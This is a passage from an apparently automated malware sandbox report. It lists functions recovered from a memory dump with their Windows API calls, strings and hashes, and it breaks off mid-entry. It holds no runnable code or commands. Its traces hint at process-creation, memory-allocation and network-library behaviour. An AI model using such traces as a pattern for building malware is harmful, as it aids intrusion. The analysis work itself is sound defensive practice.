Function 02EFA350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02EF4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02EF4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02EFA39D

Strings

.z`, xrefs: 02EFA38D, 02EFA398

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e398b84556c555b80983bc1a37117ffd35d8bfe9b2c91aba1e3255bed27e6100
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 01F0BDB2200208AFCB48DF89DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA3FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02EF4D62,5EB65239,FFFFFFFF,02EF4A21,?,?,02EF4D62,?,02EF4A21,FFFFFFFF,5EB65239,02EF4D62,?,00000000), ref: 02EFA445

Strings

(k:, xrefs: 02EFA3FA

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: (k:
API String ID: 2738559852-950158334
Opcode ID: 9a2e53960fed72ccdc71aa633400433101e9dfc0359b2be258e69eeb065b679a
Instruction ID: c477cdd101d840508b5f0ee247be330fd063a6b81a13cf6d7252c5209da2bb49
Opcode Fuzzy Hash: 9a2e53960fed72ccdc71aa633400433101e9dfc0359b2be258e69eeb065b679a
Instruction Fuzzy Hash: 3CF0A9B6200108AFCB14DF99DC90EEB77A9EF8C754F158659FA1D97241D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA400, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02EF4D62,5EB65239,FFFFFFFF,02EF4A21,?,?,02EF4D62,?,02EF4A21,FFFFFFFF,5EB65239,02EF4D62,?,00000000), ref: 02EFA445

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 59e0fb0e40127e7e21195001c874808bbb7d5876c89e36d00dd071408d930a1b
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 7EF0A4B2200208AFCB14DF89DC80EEB77ADAF8C754F158258BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA3A2, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02EF4D62,5EB65239,FFFFFFFF,02EF4A21,?,?,02EF4D62,?,02EF4A21,FFFFFFFF,5EB65239,02EF4D62,?,00000000), ref: 02EFA445

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0e6ef8a6bc600e90cc314120ae054b73dbdf12791cb951f19efa12bb877fd927
Instruction ID: 094847002e35dbee0a8aa3c635778c2b73c65a86f022614ab4dda262e643e9ee
Opcode Fuzzy Hash: 0e6ef8a6bc600e90cc314120ae054b73dbdf12791cb951f19efa12bb877fd927
Instruction Fuzzy Hash: B4F098B6244009AF8B04DF99D880CEB77ADAF8C368B118619F91D97255D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA530, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EE2D11,00002000,00003000,00000004), ref: 02EFA569

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 87e56c6c0e562ead117e574adfa9dd40465cc1a9c6d1bd6bef1c7205620c7f82
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: D8F015B2200208AFCB14DF89CC80EAB77ADAF88754F118158BE1C9B241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA480, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02EF4D40,?,?,02EF4D40,00000000,FFFFFFFF), ref: 02EFA4A5

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 6d25d9a1029c7566c5139f1e9f6e5ab822b6d88cd0c39fad5154fd448973eea9
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: C9D01776240214AFD710EB99CC85EA77BADEF48760F1584A9BA1C9B242C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD986A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b439d9337f305bcfa59457a3b4163dc30009d2978986f2f57e2cd09f8165e7a2
Instruction ID: 101f975b4055d1edba64d44dff13325b249e4f617abb43ccdd3a4501e8b18e03
Opcode Fuzzy Hash: b439d9337f305bcfa59457a3b4163dc30009d2978986f2f57e2cd09f8165e7a2
Instruction Fuzzy Hash: E090027124100513F111615F4904727000997D02C6F91C412A4416598D9696D953B161

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD984A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e73f9db465533c0808978999768e4e65da4dcf3df9ab8cecbda33c0c1c8fa5e1
Instruction ID: 48ee7ca5b53dbca024ea33a0aff4a87ac3976ad33b444c23f7371e6e0cc70ef3
Opcode Fuzzy Hash: e73f9db465533c0808978999768e4e65da4dcf3df9ab8cecbda33c0c1c8fa5e1
Instruction Fuzzy Hash: 76900261282042527545B15F48045274006A7E02C6791C012A5406990C8566E857E661

Uniqueness

Uniqueness Score: -1.00%

Function 04FD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD95DA

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6949b985f2fe242ce61dc56c428aa726561b0f60efd3f062e0a6c28ba757747
Instruction ID: fd78b5a634c80b9248509f2bb45aa3fced03348b00566933dc87c99109706176
Opcode Fuzzy Hash: b6949b985f2fe242ce61dc56c428aa726561b0f60efd3f062e0a6c28ba757747
Instruction Fuzzy Hash: 9F9002A1242001036105715F4814636400A97E0286B51C021E50065D0DC565D8927165

Uniqueness

Uniqueness Score: -1.00%

Function 04FD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD99AA

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5aec5161679fc79b9f352ec7ed24629dd010f6b24c0d9e8f6ddac938b394e88d
Instruction ID: 9527816b0bdff73ed1feff45052fc2644f8aa315f5545aff1ef8489af8a44e39
Opcode Fuzzy Hash: 5aec5161679fc79b9f352ec7ed24629dd010f6b24c0d9e8f6ddac938b394e88d
Instruction Fuzzy Hash: E39002A138100542F100615F4814B260005D7E1386F51C015E5056594D8659DC537166

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD954A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 251fb5f0a386b96752f5a657331679c091d6f7e7d84ff4e7cc63b550487ea806
Instruction ID: d8175043a092746f085fd286afadf2814bd748b18f7760b016caba1329b0b093
Opcode Fuzzy Hash: 251fb5f0a386b96752f5a657331679c091d6f7e7d84ff4e7cc63b550487ea806
Instruction Fuzzy Hash: 5D900265251001032105A55F0B04527004697D53D6351C021F5007590CD661D8626161

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD991A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4b7969ed5b78c3857ea7ed2224ca4bf59eefcc9922658a1f1ebf256c41ad347
Instruction ID: eea357a0a4e2584d9a605cee86da9100da36bcfdd25d21f73e31d0a4c075ba18
Opcode Fuzzy Hash: f4b7969ed5b78c3857ea7ed2224ca4bf59eefcc9922658a1f1ebf256c41ad347
Instruction Fuzzy Hash: DD9002B124100502F140715F4804766000597D0386F51C011A9056594E8699DDD676A5

Uniqueness

Uniqueness Score: -1.00%

Function 04FD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD96EA

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1ca946432aa35559b942f4adf404e8163b87c1de046f1c379882bb03c8971a2
Instruction ID: faf51e27412ecea44f68dc0a73ab59819f62475c2ace86087fd649b0c1c990ad
Opcode Fuzzy Hash: c1ca946432aa35559b942f4adf404e8163b87c1de046f1c379882bb03c8971a2
Instruction Fuzzy Hash: 1F90027124108902F110615F880476A000597D0386F55C411A8416698D86D5D8927161

Uniqueness

Uniqueness Score: -1.00%

Function 04FD96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD96DA

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf043bec13d89b965058f74213f94db14c951d32019f95f433b56be81dccf93
Instruction ID: 325b4ef94abf5bea302cf6f6cf9f557a910ba3ded7bb7c836fcaf6a7b02ebaf1
Opcode Fuzzy Hash: 5cf043bec13d89b965058f74213f94db14c951d32019f95f433b56be81dccf93
Instruction Fuzzy Hash: 7590027124100942F100615F4804B66000597E0386F51C016A4116694D8655D8527561

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD966A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5a142fdb0eb123765a185e820475554fc9b86b9a280ad7b307745d1e8ecdeae
Instruction ID: 86ea4c5f3f5554e1d389917d3ea92b4e7526c8e5adddc4d362e42d5561da5c80
Opcode Fuzzy Hash: b5a142fdb0eb123765a185e820475554fc9b86b9a280ad7b307745d1e8ecdeae
Instruction Fuzzy Hash: 0A90027124100902F180715F480466A000597D1386F91C015A4017694DCA55DA5A77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD965A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a028ab64bca542a35f8d90c2cae19fab5bed596e1d27087f854b1d084e934ca
Instruction ID: 3b107bedf77ede4d0504894f9a29d427951bc1481457d1bbb9affd0282483bad
Opcode Fuzzy Hash: 8a028ab64bca542a35f8d90c2cae19fab5bed596e1d27087f854b1d084e934ca
Instruction Fuzzy Hash: 7E90027124504942F140715F4804A66001597D038AF51C011A40566D4D9665DD56B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD9A5A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23da830a4057d20bd610870fca6b84c4344ba07b0104e4e2983ecd0d243be2a4
Instruction ID: 78c603ed343295921495b44a4bf4e5c1ab3056278516af2a006966c1409f01ac
Opcode Fuzzy Hash: 23da830a4057d20bd610870fca6b84c4344ba07b0104e4e2983ecd0d243be2a4
Instruction Fuzzy Hash: 5B90026125180142F200656F4C14B27000597D0387F51C115A4146594CC955D8626561

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD9FEA

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 491528015d1df48dd801df4790093aa53c93abeb7215088764c3d0cc55e23afc
Instruction ID: dd05676c0a0a07883f73cf577da323ce7fbd2a271e722d4e47a80428b4a42c60
Opcode Fuzzy Hash: 491528015d1df48dd801df4790093aa53c93abeb7215088764c3d0cc55e23afc
Instruction Fuzzy Hash: 2390027135114502F110615F8804726000597D1286F51C411A4816598D86D5D8927162

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD978A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb778114361953f03a893f625eeb1001d64304d6a8394a9799a25ab14142767a
Instruction ID: 785fa0c5067ebe7661ea3ea90812b350ffaff25500c07fc3503f5b7d4cb10af7
Opcode Fuzzy Hash: cb778114361953f03a893f625eeb1001d64304d6a8394a9799a25ab14142767a
Instruction Fuzzy Hash: ED90026925300102F180715F580862A000597D1287F91D415A4007598CC955D86A6361

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD971A

Memory Dump Source

Source File: 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.772093256.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.772110297.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b908d499ed2e97b1da4d8ae0eed7e0ce52d6f695de4a6cdebf0726382c97e520
Instruction ID: 97c77cfe45ccee7fbb0cb02099c28afc37f616ef96076278bbcc4a569b3be7f1
Opcode Fuzzy Hash: b908d499ed2e97b1da4d8ae0eed7e0ce52d6f695de4a6cdebf0726382c97e520
Instruction Fuzzy Hash: 0390027124100502F100659F5808666000597E0386F51D011A9016595EC6A5D8927171

Uniqueness

Uniqueness Score: -1.00%

Function 02EF9070, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02EF9118

Strings

wininet.dll, xrefs: 02EF90CE, 02EF90D7
net.dll, xrefs: 02EF90E1, 02EF9167, 02EF913F, 02EF914B, 02EF9173

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
Instruction ID: dd2675849ad461033b78e390a50a798c4099eb5efc5e81e7601507bea3bcd29d
Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
Instruction Fuzzy Hash: 6A31B0B2940245BBC764DF64C885FA7B7B9BB88B04F00C42DF76A5B245D730A650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EF9066, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02EF9118

Strings

wininet.dll, xrefs: 02EF90CE, 02EF90D7
net.dll, xrefs: 02EF90E1, 02EF913F, 02EF914B

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 50c02f5a02c413830a9da12c2a05864c3adf83f2c2208e276df284fe7e72883d
Instruction ID: 61478da2beaa1cba2ad17b0e3a09341d8ec48a680aa8c27bfc5f68ea3dabc602
Opcode Fuzzy Hash: 50c02f5a02c413830a9da12c2a05864c3adf83f2c2208e276df284fe7e72883d
Instruction Fuzzy Hash: 3F31E172A80204BBC754DF64C885BA7B7B8AB48704F00C06DF72D5B245D730A650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA652, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EE3AF8), ref: 02EFA68D

Strings

.z`, xrefs: 02EFA67C, 02EFA688

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: c370183461e590ade37ce7d0904cd6f13ec228884f66a82f19e3abed54dfa8c4
Instruction ID: bd221476af6a236e2ee21991d889a20706a66f8cada9804f54677f45a1dfba9e
Opcode Fuzzy Hash: c370183461e590ade37ce7d0904cd6f13ec228884f66a82f19e3abed54dfa8c4
Instruction Fuzzy Hash: 4EF039B2251304AFD714DF58CC49EAB3BA8FF88350F1181A9F95D5B251C631EA11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EE3AF8), ref: 02EFA68D

Strings

.z`, xrefs: 02EFA67C, 02EFA688

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 4fade42dcc2813e23d6c0872c1ec24df65fb7585e69eac4dca05c406d1b5be57
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 04E012B2200208AFDB18EF99CC48EA777ADAF88750F018558BA1C5B241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02EE8309, Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02EE836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02EE838B

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: dc5d67cb1f566f1af0d1bc4afc4dd764f3277e567b39ce37c6116c53b670e4b1
Instruction ID: 8b641f30bb5ed9a13f95fef70a6ed15a60f610d98bbbc4ab6e2e7653cc7984b7
Opcode Fuzzy Hash: dc5d67cb1f566f1af0d1bc4afc4dd764f3277e567b39ce37c6116c53b670e4b1
Instruction Fuzzy Hash: 8601D431AC022C77EB21AA949C03FFF772D9B00B55F059129FF04BA1C1E6A46A0646F2

Uniqueness

Uniqueness Score: -1.00%

Function 02EE8310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02EE836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02EE838B

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: b1de37db4c3956cebf73d154c7e88c27e8ba94ade740e23d509f6ec7379c52e2
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: F901A231AC022C77EB21A6949C02FFF776D6B40B55F158119FF04BA1C1E6A469064AF6

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA692, Relevance: 3.1, APIs: 2, Instructions: 54processmemoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02EE3AF8), ref: 02EFA68D
CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02EFA724

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: CreateFreeHeapInternalProcess
String ID:
API String ID: 1438695366-0
Opcode ID: d62ab1856ffba2f1bb1f0352c500b201c5a3b2e8e481cb62c8d15e67777e2acb
Instruction ID: d32f83da2cd6eb0e0ac2795c05f131917d6410477538d80c1272ef6b265d4bc0
Opcode Fuzzy Hash: d62ab1856ffba2f1bb1f0352c500b201c5a3b2e8e481cb62c8d15e67777e2acb
Instruction Fuzzy Hash: A7011AB6244114AFD714EF98DC80EEB77ADEF8C354B15C659FA4C9B244C631E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EEACE0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02EEAD52

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: a5dd6a0613785301264943c2197a2f9d6abe0429a3fa4cf27257fd0274aff543
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: C1011EB5D8020DABDF10EBA4DD41FDEB7B99B5430CF1095A9EA0997240FA31E714CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02EFA6D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02EFA724

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: e505d97fadcecd01e87584904f177fc5c0c56c4de3e283afcbe44215a0feb939
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EF91A0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02EEF040,?,?,00000000), ref: 02EF91DC

Memory Dump Source

Source File: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Offset: 02EE0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d001787dd8ca96fa65b2911aefc285a5cdad22473a2ac9871353164a03a2e4aa
Instruction ID: 93843636dfdbdc1f9f432ca2c7c25eae42819ad8a366ae871fb8c183d25bf313
Opcode Fuzzy Hash: d001787dd8ca96fa65b2911aefc285a5cdad22473a2ac9871353164a03a2e4aa
